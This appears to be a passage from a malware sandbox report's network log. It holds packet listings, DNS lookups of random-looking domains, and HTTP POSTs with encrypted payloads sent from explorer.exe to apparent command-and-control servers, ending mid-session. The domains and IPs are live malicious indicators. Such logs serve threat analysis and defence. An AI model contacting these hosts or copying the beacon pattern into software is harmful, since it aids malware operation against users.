Dec 24, 2023 10:44:34.219419956 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.219468117 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.219579935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.219640970 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.219696045 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.219763994 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.220274925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.220345020 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.220402002 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.220413923 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.220453978 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.220479965 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.220566988 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.221014977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.221062899 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.221122980 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.221165895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.221214056 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.221215010 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.221271992 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.221302032 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.222039938 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.222053051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.222086906 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.222105980 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.222152948 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.222192049 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.222330093 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.222851992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.222898006 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.222899914 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.222944975 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.222959995 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.223023891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.223057985 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.223247051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.223845959 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.223887920 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.223911047 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.223949909 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.224004030 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.224042892 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.224090099 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.224241018 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.224673033 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.224822044 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.224869013 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.224900007 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.224940062 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.224980116 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.225116968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.225429058 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.225440979 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.225481033 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.225513935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.225543022 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.225590944 CET	49724	80	192.168.2.5	5.42.65.125

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2023 10:44:13.522524118 CET	192.168.2.5	1.1.1.1	0x8861	Standard query (0)	onualituyrs.org	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:13.759264946 CET	192.168.2.5	1.1.1.1	0xec48	Standard query (0)	sumagulituyo.org	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:14.596426964 CET	192.168.2.5	1.1.1.1	0x617e	Standard query (0)	snukerukeutit.org	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:15.429938078 CET	192.168.2.5	1.1.1.1	0x543b	Standard query (0)	lightseinsteniki.org	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:16.772123098 CET	192.168.2.5	1.1.1.1	0x9cc7	Standard query (0)	liuliuoumumy.org	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:18.143791914 CET	192.168.2.5	1.1.1.1	0x609c	Standard query (0)	stualialuyastrelia.net	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:30.024327040 CET	192.168.2.5	1.1.1.1	0x5726	Standard query (0)	reviveincapablewew.pw	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:30.170166016 CET	192.168.2.5	1.1.1.1	0xf651	Standard query (0)	opposesicknessopw.pw	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:30.309112072 CET	192.168.2.5	1.1.1.1	0x1922	Standard query (0)	politefrightenpowoa.pw	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:30.453883886 CET	192.168.2.5	1.1.1.1	0xc0dd	Standard query (0)	chincenterblandwka.pw	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:36.571419001 CET	192.168.2.5	1.1.1.1	0x1ec7	Standard query (0)	ftpvoyager.cc	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:37.556585073 CET	192.168.2.5	1.1.1.1	0x1ec7	Standard query (0)	ftpvoyager.cc	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:38.567969084 CET	192.168.2.5	1.1.1.1	0x1ec7	Standard query (0)	ftpvoyager.cc	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:43.115065098 CET	192.168.2.5	1.1.1.1	0x545c	Standard query (0)	cream.hitsturbo.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:43.162434101 CET	192.168.2.5	1.1.1.1	0x888c	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:45:08.325680017 CET	192.168.2.5	1.1.1.1	0xfc8c	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:45:08.487067938 CET	192.168.2.5	1.1.1.1	0xbe86	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:45:56.617355108 CET	192.168.2.5	1.1.1.1	0x6aae	Standard query (0)	iplogger.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:45:57.825440884 CET	192.168.2.5	1.1.1.1	0x899e	Standard query (0)	zonealarm.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:45:59.012942076 CET	192.168.2.5	1.1.1.1	0xc262	Standard query (0)	www.zonealarm.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:46:00.824980974 CET	192.168.2.5	1.1.1.1	0x56df	Standard query (0)	www.kaspersky.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:46:02.145684958 CET	192.168.2.5	1.1.1.1	0xc6a4	Standard query (0)	usa.kaspersky.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:46:20.461738110 CET	192.168.2.5	1.1.1.1	0x15ce	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:46:30.803818941 CET	192.168.2.5	1.1.1.1	0xe521	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:46:41.656760931 CET	192.168.2.5	1.1.1.1	0x48e4	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:46:51.966233969 CET	192.168.2.5	1.1.1.1	0x358a	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:02.393836975 CET	192.168.2.5	1.1.1.1	0xc2ff	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:13.134700060 CET	192.168.2.5	1.1.1.1	0xca51	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:22.688324928 CET	192.168.2.5	1.1.1.1	0x8b4e	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:33.952527046 CET	192.168.2.5	1.1.1.1	0x5889	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:44.278609037 CET	192.168.2.5	1.1.1.1	0x37ee	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:44.426620960 CET	192.168.2.5	1.1.1.1	0xd608	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:58.496963024 CET	192.168.2.5	1.1.1.1	0x9b4e	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2023 10:44:13.754403114 CET	1.1.1.1	192.168.2.5	0x8861	Name error (3)	onualituyrs.org	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:14.056945086 CET	1.1.1.1	192.168.2.5	0xec48	No error (0)	sumagulituyo.org		34.94.245.237	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:14.886971951 CET	1.1.1.1	192.168.2.5	0x617e	No error (0)	snukerukeutit.org		104.198.2.251	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:15.603657961 CET	1.1.1.1	192.168.2.5	0x543b	No error (0)	lightseinsteniki.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:16.979304075 CET	1.1.1.1	192.168.2.5	0x9cc7	No error (0)	liuliuoumumy.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:18.270304918 CET	1.1.1.1	192.168.2.5	0x609c	No error (0)	stualialuyastrelia.net		91.215.85.17	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:30.586675882 CET	1.1.1.1	192.168.2.5	0xc0dd	No error (0)	chincenterblandwka.pw		172.67.176.11	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:30.586675882 CET	1.1.1.1	192.168.2.5	0xc0dd	No error (0)	chincenterblandwka.pw		104.21.64.47	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240374088 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		195.158.3.162	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240374088 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		201.119.56.230	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240374088 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		190.224.203.37	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240374088 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		123.140.161.243	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240374088 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		175.119.10.231	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240374088 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		109.175.29.39	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240374088 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		187.156.96.226	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240374088 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		211.168.53.110	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240374088 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		211.53.230.67	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240374088 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		175.126.109.15	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240401983 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		195.158.3.162	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240401983 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		201.119.56.230	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240401983 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		190.224.203.37	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240401983 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		123.140.161.243	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240401983 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		175.119.10.231	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240401983 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		109.175.29.39	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240401983 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		187.156.96.226	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240401983 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		211.168.53.110	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240401983 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		211.53.230.67	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240401983 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		175.126.109.15	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240451097 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		195.158.3.162	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240451097 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		201.119.56.230	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240451097 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		190.224.203.37	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240451097 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		123.140.161.243	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240451097 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		175.119.10.231	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240451097 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		109.175.29.39	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240451097 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		187.156.96.226	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240451097 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		211.168.53.110	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240451097 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		211.53.230.67	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:39.240451097 CET	1.1.1.1	192.168.2.5	0x1ec7	No error (0)	ftpvoyager.cc		175.126.109.15	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:43.244844913 CET	1.1.1.1	192.168.2.5	0x545c	No error (0)	cream.hitsturbo.com		172.67.168.30	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:43.244844913 CET	1.1.1.1	192.168.2.5	0x545c	No error (0)	cream.hitsturbo.com		104.21.46.59	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:43.287300110 CET	1.1.1.1	192.168.2.5	0x888c	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2023 10:44:43.287300110 CET	1.1.1.1	192.168.2.5	0x888c	No error (0)	api4.ipify.org		173.231.16.77	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:43.287300110 CET	1.1.1.1	192.168.2.5	0x888c	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:44:43.287300110 CET	1.1.1.1	192.168.2.5	0x888c	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:45:08.483278990 CET	1.1.1.1	192.168.2.5	0xfc8c	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:45:08.612771988 CET	1.1.1.1	192.168.2.5	0xbe86	No error (0)	host-host-file8.com		158.160.130.138	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:45:56.743737936 CET	1.1.1.1	192.168.2.5	0x6aae	No error (0)	iplogger.com		172.67.188.178	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:45:56.743737936 CET	1.1.1.1	192.168.2.5	0x6aae	No error (0)	iplogger.com		104.21.76.57	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:45:57.952598095 CET	1.1.1.1	192.168.2.5	0x899e	No error (0)	zonealarm.com		209.87.209.205	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:45:59.332802057 CET	1.1.1.1	192.168.2.5	0xc262	No error (0)	www.zonealarm.com	www.zonealarm.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2023 10:46:00.999689102 CET	1.1.1.1	192.168.2.5	0x56df	No error (0)	www.kaspersky.com	multisite3.geo.kaspersky.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2023 10:46:00.999689102 CET	1.1.1.1	192.168.2.5	0x56df	No error (0)	multisite3.geo.kaspersky.com		185.85.15.47	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:46:02.355053902 CET	1.1.1.1	192.168.2.5	0xc6a4	No error (0)	usa.kaspersky.com	multisite3.geo.kaspersky.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2023 10:46:02.355053902 CET	1.1.1.1	192.168.2.5	0xc6a4	No error (0)	multisite3.geo.kaspersky.com		185.85.15.46	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:46:20.588207960 CET	1.1.1.1	192.168.2.5	0x15ce	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:46:30.929491043 CET	1.1.1.1	192.168.2.5	0xe521	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:46:41.848160028 CET	1.1.1.1	192.168.2.5	0x48e4	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:46:52.092200994 CET	1.1.1.1	192.168.2.5	0x358a	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:02.518609047 CET	1.1.1.1	192.168.2.5	0xc2ff	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:13.260453939 CET	1.1.1.1	192.168.2.5	0xca51	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:22.814279079 CET	1.1.1.1	192.168.2.5	0x8b4e	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:34.077917099 CET	1.1.1.1	192.168.2.5	0x5889	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:44.404033899 CET	1.1.1.1	192.168.2.5	0x37ee	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:44.583642960 CET	1.1.1.1	192.168.2.5	0xd608	No error (0)	host-host-file8.com		158.160.130.138	A (IP address)	IN (0x0001)	false
Dec 24, 2023 10:47:58.622054100 CET	1.1.1.1	192.168.2.5	0x9b4e	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	34.94.245.237	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:14.319380999 CET	277	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rmxsdoiubcthmnpt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: sumagulituyo.org
Dec 24, 2023 10:44:14.319410086 CET	301	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 e0 d9 36 ca Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bO67c<?`HSw)8\|C&[}Oysp03KIKrH$q(LLf\YaJgpM&NIC)G8&>FNpW
Dec 24, 2023 10:44:14.580334902 CET	422	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Dec 2023 09:44:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=2a47b59b5672cb6a849398afa9f1caef\|102.129.152.212\|1703411054\|1703411054\|0\|1\|0; path=/; domain=.sumagulituyo.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	104.198.2.251	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:15.157504082 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jifpetpxunlhnkjb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 189 Host: snukerukeutit.org
Dec 24, 2023 10:44:15.157541037 CET	189	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 e6 b5 34 fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bO4'uAshh@L?]\|_T>Y!i>^t5Y@=/K}RXM\.
Dec 24, 2023 10:44:15.426502943 CET	423	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Dec 2023 09:44:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=64e83aa56476943b7a80a1d7680c09fb\|102.129.152.212\|1703411055\|1703411055\|0\|1\|0; path=/; domain=.snukerukeutit.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	34.143.166.163	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:16.186765909 CET	279	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://llolrcsecsfuqj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 121 Host: lightseinsteniki.org
Dec 24, 2023 10:44:16.186841011 CET	121	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 a7 de 13 f8 Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bO;.T ,Fw3D9uk"
Dec 24, 2023 10:44:16.767254114 CET	426	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Dec 2023 09:44:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=2a7e3232466ca2564c1f485675c017a1\|102.129.152.212\|1703411056\|1703411056\|0\|1\|0; path=/; domain=.lightseinsteniki.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	34.143.166.163	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:17.560976028 CET	276	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xuodqppsfrrhudh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 116 Host: liuliuoumumy.org
Dec 24, 2023 10:44:17.561016083 CET	116	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 95 e5 1b d9 Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bO%>&EK0iz+t
Dec 24, 2023 10:44:18.139978886 CET	422	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Dec 2023 09:44:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=9ea23d75c495c8cb9d23a08fc0b67574\|102.129.152.212\|1703411057\|1703411057\|0\|1\|0; path=/; domain=.liuliuoumumy.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49716	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:18.546083927 CET	281	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rlfrvmkisufwom.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: stualialuyastrelia.net
